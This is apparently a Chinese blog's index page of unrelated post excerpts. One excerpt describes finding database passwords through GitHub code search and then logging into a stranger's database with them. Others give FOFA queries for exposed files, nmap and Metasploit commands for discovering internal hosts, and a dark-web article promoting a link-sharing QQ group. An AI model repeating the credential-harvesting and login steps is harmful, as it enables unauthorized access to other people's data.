声明:文章只做技术交流,请勿用于非法用途 github 上的配置信息泄漏 GitHub是一个面向开源及私有软件项目的托管平台,因为只支持git 作为唯一的版本库格式进行托管,故名GitHub。 打开github官网。搜索字符串jdbc:mysql。 选择: code 和 Recently indexed。 这样就查询出含 jdbc:mysql的最新更新的代码。图中可以看到,已经查到了腾讯云数据库连接地址和账号密码。 尝试使用 navicat 连接后,成功连接。 无论密码和用户名多复杂,一旦泄漏,也就没用了 当然,由于GitHub本身的搜索算法的原因,结果可能和我们想的不一样。但是手动查找后,还是能找到一些成果的。 *国内的码云也可以用类似的方法去搜索,不过效果不如GitHub。 日志文件泄漏 网络空间资产检索系统(FOFA)是世界上数据覆盖最完整的IT设备搜索引擎,拥有全球联网IT设备最全DNA信息。探索全球互联网的资产信息,进行资产及漏洞影响范围分析、应用分布统计、应用流行度态势感知等。 打开FOFA搜索引擎,输入:body="log.txt" && country=CN。便可以查找到有关log.txt的IP。 点开一个可以看到: 当然,这个里面没有什么敏感的信息。细心去找的话,还是能找到不少的。 除了搜索日志,也可以搜索sql文件、后台路径等等。 除此之外,大家熟知的可能还有 google搜索、钟馗之眼等等,都可以用来搜索具有某种特征的IP,合理利用就可以查询到大量信息。所以,在日常工作生活中,需要多多注意一些敏感信息的使用,做好个人信息、公司信息的保护。 ...
-
怎么样才能拥有一个打CTF的男朋友?
妹子不要被网剧骗了...CTFer才不是电视上那样..1.头像基本是这个画风 2.讲话基本是这个画风3.书包这个画风4.表情包这个画风5.比赛真实画风(脸都 了 给品品还是不是你韩的类型 (大师傅见侵删 6.CTFer为女朋友准备的惊喜 A.一大桶星球杯(?)B.土掉渣的刻有1314字样的水杯(?)就是这个C.你死也看不懂的浪?漫?惊?喜? 就是一大堆代码截图 然后说我有了他计算机的最高权限之类的 我是真的emmmmm?? 还有给你一堆加密的文字 说里面藏了一个秘密 (呵 好像基本全是母胎单身.... 但似乎脱单了的基本都是很粘人的好男朋友.. 单纯的角色.. 7.平时跟你线下聊天的画风 哈哈哈 这个A1B2C3D4竟然”)/了我的$&;我他妈分分钟就’_~>€ 然后他的&@就不能—#^我的***了 。笑死我了。你在没在听啊?你咋不理我。哼!(撅嘴。8.日常生活 A.到一个地方不允许连Wi-Fi B.电脑上贴一堆软件图标(? C.无论多热 无论多重 约会必带包 书包里必有一到两台电脑 无论吃饭排队等人 随时打开看两行代码 D.要以拍照片的形式记住自己一些信息 必须斜着拍 反正不能正经拍 说会泄漏被盗用 E.“B站源码泄漏 你快改密码”“XX平台有漏洞 你最近别用了” F.VX QQ全是各种技术群置顶 .... 然后闲下来把没看的消息从头看到尾 ...并配上一张表情包➕tql G.复读鸡 等等等等等等....... 总之画风大抵就是一瓶5L农夫山泉(不盖盖子)在电脑桌旁➕一件皱巴巴的衬衫➕齁背➕内心脆弱➕脸上油腻腻➕运动无能的感觉..... 但是真的很贴心 (虽然很蠢 虽然我说了一大堆 但是CTFer无论如何也是人类中的一员 还是各有特色(?)... 所以妹子不需要限定男朋友的范围... 就.. 随缘吧。(嘻 嘻) (反正我这辈子是栽进去了) (溜走) ...
-
暗网悲剧的前半生:亲爹傻逼,养父脑残。
大家好,我是毒蜂。 从2017年所爆发的全球勒索病毒,把暗网这个词带入了大众的视野。 暗网不负众望,2018年再次拉向高潮——华住旗下3千万酒店开房数据,在暗网中文论坛出售。 不幸中的万幸,这份数据并没有传播在互联网上,不然得有多少情侣夫妻展开男女混合双打。 再加上大量自媒体一篇又一篇夺人眼球的文章诞生,暗网成为了恐怖的代名词。 但在反观暗网目前的现状时,里面确实存在着非法交易,不过远没有自媒体笔下所描述的如此恐怖。 买凶杀人,在我们大天朝如此安全的环境下,想都不要想。 普通人没人会花钱杀你,除非你跟别人有深仇大恨,比如抢人老婆。 再说了,杀完人后你能躲避的了密密麻麻的道路摄像头吗? 所以呐,不要总觉得暗网多神秘,其实就是跟咱中国的黑产圈差不多。 只不过中国安全,没什么杀手。 今天这篇文章,就是想带你们正确的认识暗网。 什么是暗网。 可以这样理解,我们平常访问的网络称之为表层网络,例如百度,谷歌,B站,YouTube,等所有的网站都属于表层网络,那些需要科学上网才能访问的国外网站同样也是。 在这片表层网络之下,还有一个深层网络,想要访问它必须得通过特定的浏览器,连接其网桥才能访问,大概跟我们平常用的翻墙软件差不多。 这个网络称之为:暗网。 因为有一定的门槛,以及匿名性较为良好,受到了比较多的犯罪分子喜爱,他们在里面搭建非法网站去避免警方追踪。 这是另一个平行互联网世界。 任何事物都得有个起源,包括孙悟空也不是凭空出现的-—它娘是块大石头。 暗网也不例外,只不过它有两个爹,一亲爹和一养父,但这俩爹脑子都不大好使。 为什么这么说呢? 1995年,美国海军为了避免体系内的网络通讯不被人追踪,就投入资金让美国海军实验室研究一个相对安全的通讯工具。 这个通讯工具很快就被研发出来,也就是早期的暗网,那个时候它还不叫暗网,叫做Tor网络 这个Tor网络的加密方式非常奇特,跟一洋葱似的,美国海军的通讯就被藏在洋葱的核心里,外面有着一层一层的洋葱皮保护着。使用者通过多个节点进行掩盖痕迹访问网络。 所以Tor网络也称为洋葱网络。 它能帮助美国海军独立在网络世界里,成为另一个体系。 可惜好景不长。 一直到2004年,美国政府陷入了财政紧缺,就撤掉了对Tor网络的资金支持,还把这个项目开源到了网上。 Tor不但被亲爹抛弃,还丢到垃圾桶里。 但Tor这孩子长得水灵,招人稀罕,很快就有一个叫电子前哨基金会的自由主义网络组织,接管了Tor网络项目,并且投入资金与技术支持。 可谓是一把屎一把尿养大。 这个自由组织就是Tor的养父,不过这个爹的脑子指定也有点毛病。 等Tor长大成熟后,养父把它对外公开使用,对外公开使用,至于为什么,人家不说,咱也不敢问。 这个自由组织是美国政府监听互联网事件最大的反对组织之一。 在这之前,他们曾揭露过美国的棱镜计划。 我想,你们应该明白为什么把TOR网络对外开放使用了吧? 但这步棋是臭棋! 在这个基金会对外开放使用Tor网络后,一些心里揣着怀心思的人利用Tor网络建立了一批又一批的违法犯罪网站,就是这样,暗网一词就此诞生。 从被亲爹抛弃,再到被养父利用。 你说暗网这孩子悲剧不悲剧?自媒体经常说,我们平常访问的网络其实不足暗网的十分之一。 夸张性描述 我求求你们别扯犊子了。 相比表网而言,暗网的规模要小的多,因为Tor的网络节点宽带压根支撑不起那么庞大的网络流量! 其次就是暗网真的那么安全吗? 答案是否定的。 当今文明社会,全球的执法机构都无法容忍犯罪行为扩散,即使它的匿名性良好,警方仍然能找到更多的侦查方式。 例如国外有俩安全调查员,通过爬虫技术批量爬取了一个非法网站里的商品图片,通过这些照片遗留的EXIF信息整理出了一张商家物理位置分布图。 通过照片EXIF信息确认的位置分布图又或者根据浏览器指纹,SSH指纹,图片指纹,运单等技术侦查手段,找到暗网买卖双方信息 比如曾经大名鼎鼎的丝绸之路就是一个很好的例子——从1.0 版本到 3.0 版本,已经被警方打击了四次。 以前的丝绸之路,以贩卖毒品枪支为主 期间警方为了抓捕第一代创始人——乌布利希,扮演多米尼亚共和国的毒品走私犯,以花10亿美元购买丝绸之路网站为由,去接近乌布利希 最终,乌布利希在一家图书馆被抓获,荣获无期徒刑奖励一份,虽然功劳并不在卧底那。 当然,一代创始人被抓后,并没有因此结束,丝绸之路的故事还在继续,只不过写这故事的人不是他了而已。 因为刑罚第一课就说明了原因。 人类无法彻底消灭犯罪。 那么真实的暗网是否全是非法网站? 答案同样是否定。 在暗网中的非法网站只占据百分之五十,例如自媒体常说的枪支毒品贩卖一类网站。 他们属于商业类站点。 这类商业非法网站,主要是以毒品,枪支,假钞,护照,银行卡,比特币洗钱,雇佣黑客与杀手等一类服务为主。 此类网站只占据暗网的百分之十五。 其次属于成人色情类只占据百分之二,以正常色情片以及儿童色情内容为主。 占据比例最少的属于政治以及异教徒网站,主要是发布反对国家政权言论,激进主义言论,传教等,占据暗网比例的百分之一。 其实在墙外也有着抹黑咱们国家的中国人,比如随想编程这个狗逼,那为什么没人抓他? 我觉得就一个原因——跳梁小丑不值一提。 既然不喜欢这个国家,就移民出去,大可不必拿着大喇叭天天说坏话。 就像有的人不喜欢我我博客一样,不看就行了,犯不着跑到评论区喷人。 嘴臭王者。 最后剩余的就是艺术以及音乐类网站还有那些无法访问,或无效的网站,占据了百分之五十。 没错,暗网将近一半的都不是非法网站。 那我们国家有暗网吗? 有——暗网中文论坛。 其模式与丝绸之路相差不了多少——都是买卖双方进行交易的一个担保平台,例如卖家发布需求或广告,买家通过中文论坛的担保功能进行支付,等到货后平台会自动把钱打到卖家手上。当代暗黑版淘宝。 这个中文论坛因为2018年连续几件的信息泄露,现在成为了威胁情报的重要来源。 除此之外,还备受国家安全局,警察,国内黑客,白帽子,等群体关注。 马云说过让天下没有难做的生意,暗网中文论坛同样也是,不过阿里不违法。 中文论坛里的交易几乎涵盖了全部的黑色产业链,上到毒品迷药出售,下到个人信息数据贩卖,应有尽有。 毒品主要以,Kush,og,ak为主,在暗网中文论坛以及telegram的黑产群上并不少见。 Kush是美国俚语里大麻的意思。 Og同样也是大麻,属于当代大麻世界的潮流品种之一。 至于他们在国内是如何将毒品寄出的,暂时还不了解,毕竟干他们这一行的比黑产还要谨慎。 迷药一直是常见货,无论是黑市上,还是那些为钱不怕死的狗逼微商们,甚至大街上写着的小广告都能看到有。 例如最常见的三唑仑安眠药,很多人拿去酒吧迷晕女孩捡尸体。当然,也有个别不怕死的老板想卖枪的,这个就不评论了。 我怕他们取我狗命。 我在百度暗网时,看到推荐的搜索,把我笑成了傻逼。这个问题在很早之前就有人问过我,这得感谢把暗网吹嘘的神乎其技的自媒体们。 针对“上暗网会不会有生命危险”的问题。 首先正常访问暗网是百分百没问题的,但不要在里面购买东西,一方面是暗网里存在非常多的欺诈,另一方面暗网里有些网站是警方搭建的钓鱼网站。 假设你在里面与人发生争执,不要害怕,没人会因为这点小事去杀你灭口,如果真有,继续往下看。 要知道暗网匿名性非常优秀,对于反追踪,我认为普通人没有能力做到,如果对方是个黑客高手,能追查到的信息只有真实IP地址。 IP地址很难精确到具体位置,这一点大可放心,哪怕精准到你的物理位置,你的个人信息一概不知,姓名,长相,身高,等等。 但对于未知事物,我们仍需警惕,能不得罪人尽量不得罪。如今进入暗网的方法变得越来越简单,不需要技术,不需要知识,只需要一个软件就能轻松访问。 能让大众探索未知事物是好事,但暗网门槛变得如此低,确实不可行。 暗网交流群,群文件会持续更新TOR相关东西、暗网网址等。。。QQ群号:979727860 点击链接加入群聊:https://jq.qq.com/?_wv=1027&k=FDmmUxxL ...
-
Kirin博客浅谈今日香港问题
因为很多和谐的原因,本人不愿意在Kirin博客上就涉港澳台事件发表意见。但是近期的香港元朗暴力、恐怖事件的发生,实在让我安耐不住内心的愤怒。 “一国两制”伟大构想在香港世间二十多年以来,香港得到了除外交国防意外的高度自治。香港依托独特的优势,本来可以继续腾飞50年。但是近年来,一小撮“港独”分子(社会败类)不断制造骚乱。 个人认为,香港近年来暴力、暴力事件之所以愈演愈烈,很大程度上归根于香港司法体系。香港终审法院17名常任和非常任大法官中,仅有两人为中国香港籍,其余均为外国国籍或双重国籍。可笑吗,中国主权下的领土,司法体系最高级别法官居然有外国人,而且还是压倒性的多数。 这样看来,对于之前新闻报道的几名香港警察因为依法处置暴乱、暴力分子而被判刑撤职的事情,我们就很容易理解了。外国反华势力的黑手不是近几年才伸进香港,而是他们的黑手从来都没有收回过。最令人惊讶的是,这黑手一只牢牢把握着香港社会稳定的命门——司法部门。 因为之前香港法院对警务人员的不公正裁决,导致很多警员丢了饭碗。看看这次的元朗暴力、暴力事件,警务人员本可以依法及时处置,却因为忌惮法院的判例而畏手畏脚。 很多人都在叫嚷着找到香港暴力事件的幕后黑手,虽然没有具体的目标,但是大致范围是确定的。那只扰乱香港秩序的黑手,一定就是这名单中的某个或某几个人。...
-
基于 UDP /ARP发现内网存活主机
UDP简介: UDP(User Datagram Protocol)是一种无连接的协议,在第四层-传输层,处于IP协议的上一层。UDP有不提供数据包分组、组装和不能对数据包进行排序的缺点,也就是说,当报文发送之后,是无法得知其是否安全完整到达的。 UDP显著特性: 1.UDP 缺乏可靠性。UDP 本身不提供确认,超时重传等机制。UDP 数据报可能在网络中被复制,被重新排序,也不保证每个数据报只到达一次。 2.UDP 数据报是有长度的。每个 UDP 数据报都有长度,如果一个数据报正确地到达目的地,那么该数据报的长度将随数据一起传递给接收方。而 TCP 是一个字节流协议,没有任何(协议上的)记录边界。 3.UDP 是无连接的。UDP 客户和服务器之前不必存在长期的关系。大多数的UDP实现中都选择忽略源站抑制差错,在网络拥塞时,目的端无法接收到大量的UDP数据报 4.UDP 支持多播和广播 利用nmap扫描 nmap -sU -T5 -sV --max-retries 1 192.168.0.1/24 -p 500 Shell 复制 或者 nmap -sU -T4 -sV 192.168.0.1/24 Shell 复制 msf扫描 msf5 > use auxiliary/scanner/discovery/udp_probe msf5 auxiliary(scanner/discovery/udp_probe) > show options Module options (auxiliary/scanner/discovery/udp_probe): Name Current Setting Required Description ---- --------------- -------- ----------- CHOST no The local client address RHOSTS yes The target address range or CIDR identifier THREADS 1 yes The number of concurrent threads msf5 auxiliary(scanner/discovery/udp_probe) > set RHOSTS 192.168.0.1/24 RHOSTS => 192.168.0.1/24 msf5 auxiliary(scanner/discovery/udp_probe) > set THREADS 10 THREADS => 10 msf5 auxiliary(scanner/discovery/udp_probe) > run Shell 复制 或者执行 use auxiliary/scanner/discovery/udp_sweep Shell 复制 ARP简介: ARP,通过解析网路层地址来找寻数据链路层地址的一个在网络协议包中极其重要的网络传输协议。根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机,并接收返回消息,以此确定目标的物理地址 nmap扫描 nmap -sn -PR 192.168.0.1/24 Shell 复制 普及 osi七层模型图解 ...
-
【社会关注】国务院原总理李鹏同志逝世
中国共产党中央委员会、中华人民共和国全国人民代表大会常务委员会、中华人民共和国国务院、中国人民政治协商会议全国委员会沉痛宣告:中国共产党的优秀党员,久经考验的忠诚的共产主义战士,杰出的无产阶级革命家、政治家,党和国家的卓越领导人,中国共产党第十二届中央政治局委员、中央书记处书记,第十三届、十四届、十五届中央政治局常委,国务院原总理,第九届全国人民代表大会常务委员会委员长李鹏同志,因病医治无效,于2019年7月22日23时11分在北京逝世,享年91岁。 李鹏同志1928年10月生,四川成都人。他出身革命家庭,幼年时父亲英勇就义,少年时期受家庭影响,主动接受革命思想,立志投身革命事业。1941年3月,他到延安参加革命工作,接受革命理论和科学文化知识教育,1945年11月加入中国共产党。解放战争时期,他响应党组织号召奔赴前线,历任晋察冀电业公司技术员,哈尔滨油脂厂协理、党支部书记。1948年9月,根据党组织安排到苏联留学。1955年回国后,他主动要求到基层工作,历任丰满发电厂副厂长、总工程师,东北电业管理局副总工程师、调度局局长,阜新发电厂厂长。1966年至1979年,历任北京供电局党委代理书记、革委会主任,北京电业管理局局长、党组书记。“文化大革命”期间,受到冲击,但他坚持党性原则,实事求是,进行斗争。1979年4月起,历任电力工业部副部长、党组成员兼华北电业管理局党组书记,电力工业部部长、党组书记,水利电力部副部长、党组副书记,他创造性地贯彻党中央“电力要先行”战略,提出电力适度超前发展,推动我国在电站建设和电力生产、电网管理等方面取得长足进步,是我国电力工业的杰出领导人、核电事业的重要开创者。1983年6月,李鹏同志任国务院副总理,1985年9月在中共十二届五中全会上增选为中央政治局委员、中央书记处书记。他分管能源、交通、重点建设项目等工作,参与研究“七五”计划能源交通方面的发展方针,推动建立综合统一的交通运输体系和基本建设体制改革,加快重大技术装备研制步伐。1987年11月,李鹏同志在中共十三届一中全会上当选为中央政治局委员、常委,同月在六届全国人大常委会第二十三次会议上被任命为国务院代总理。1988年4月,在七届全国人大一次会议上被任命为国务院总理。他坚决贯彻治理整顿和深化改革的方针,探索对国民经济进行宏观调控的新手段和新方法,推动我国经济摆脱困境、进入新的发展时期。1989年春夏之交的政治风波中,在以邓小平同志为代表的老一辈无产阶级革命家坚决支持下,李鹏同志旗帜鲜明,和中央政治局大多数同志一道,采取果断措施制止动乱,平息反革命暴乱,稳定了国内局势,在这场关系党和国家前途命运的重大斗争中发挥了重要作用。1989年6月中共十三届四中全会后,作为以江泽民同志为核心的中央领导集体的重要成员,李鹏同志高举邓小平理论和“三个代表”重要思想伟大旗帜,深入贯彻党的十一届三中全会以来的路线方针政策,为党和国家事业发展殚精竭虑。1992年10月,李鹏同志在中共十四届一中全会上再次当选为中央政治局委员、常委。1993年3月,在八届全国人大一次会议上,他再次被任命为国务院总理。邓小平同志发表南方谈话后,他积极支持、宣传和贯彻邓小平同志改革开放的思想主张,坚决贯彻党的十四大精神,加快社会主义市场经济体制改革步伐,扩大对外开放,加强和改善宏观调控,在党中央领导下主持制定“九五”计划,布局建设一批国家重大项目,推动国民经济持续快速健康发展。1997年9月,李鹏同志在中共十五届一中全会上又一次当选为中央政治局委员、常委。1998年3月,在九届全国人大一次会议上,他当选为全国人民代表大会常务委员会委员长。 到中央工作后,李鹏同志兼任国家教育委员会主任、国务院环境保护委员会主任、中央专委会主任、国家科技领导小组组长、中央外事工作领导小组组长等,在科技、教育、环保、外交和国防工业等领域倾注了大量心血。他贯彻“科学技术是第一生产力”思想和优先发展教育战略,大力推进科技体制、教育体制改革,认真落实知识分子政策,提高了国家整体科技实力,为改革开放各条战线输送了大批人才。他强化环境管理,在实践中完善环境保护基本国策和“三同步”“三统一”战略方针,为初步走出一条具有中国特色的环境保护道路作出重要贡献。他坚决贯彻执行独立自主的和平外交政策,高举和平共处五项原则旗帜,组织、参与大量卓有成效的双边、多边外交活动,为开创全方位外交新格局作出重要贡献。他坚决贯彻中共中央关于统一战线和人民政协的方针政策,贯彻“一国两制”方针,参与领导香港、澳门回归各项工作。他在三峡工程科学民主决策和建设中发挥了重要作用,积极支持推动我国载人航天事业发展。李鹏同志是我国社会主义市场经济体制的重要开创者、忠实践行者、积极推动者。他始终坚持从中国国情出发,正确处理改革发展稳定关系,统筹推进财税体制、金融体制、价格体制、外贸体制、社会保障制度和国有企业改革,稳定农村政策,支持经济特区发展,平稳推进计划经济体制向社会主义市场经济体制转变,为20世纪末我国初步建立社会主义市场经济体制发挥了重要作用。李鹏同志是中国特色社会主义民主法治建设的重要领导者。他担任宪法修改小组组长主持起草宪法修正案草案并经全国人大通过,以国家根本大法形式确立了邓小平理论的指导思想地位,明确依法治国的基本方略、社会主义初级阶段的基本经济制度和分配制度以及非公有制经济重要作用等内容,任期内审议通过法律和有关法律决定草案百余件,推动了以宪法为核心的中国特色社会主义法律体系初步形成。李鹏同志对人民群众特别是困难群众饱含深情,高度重视扶贫工作,十分关心国有企业下岗职工的冷暖。 2003年3月,李鹏同志不再担任全国人大常委会委员长职务。从领导岗位上退下来以后,他坚决拥护和支持以胡锦涛同志为总书记的党中央,坚决拥护和支持以习近平同志为核心的党中央,关心中国特色社会主义伟大事业,坚定支持党风廉政建设和反腐败斗争。 李鹏同志的一生,是革命的一生、战斗的一生、光辉的一生,是全心全意为人民服务、为共产主义事业奋斗的一生。他的逝世,是党和国家的重大损失。我们要学习他的革命精神、崇高品德和优良作风,更加紧密地团结在以习近平同志为核心的党中央周围,不忘初心、牢记使命,为决胜全面建成小康社会、夺取新时代中国特色社会主义伟大胜利、实现中华民族伟大复兴的中国梦而努力奋斗。 李鹏同志永垂不朽! ...
-
CCTV之91大神等人落网
91多位名人被捕,夯先生、秦先生、仓本C仔、呆哥等,有几位还是外企高管或者海外留学生, 虽然91服务器在国外,侦破难度很大,不过都难不住JC,节目记录了大神们的作案手法和设备。 地址:http://tv.cntv.cn/video/C28169/b27781706db1474697fcdd0e8153b4ea ...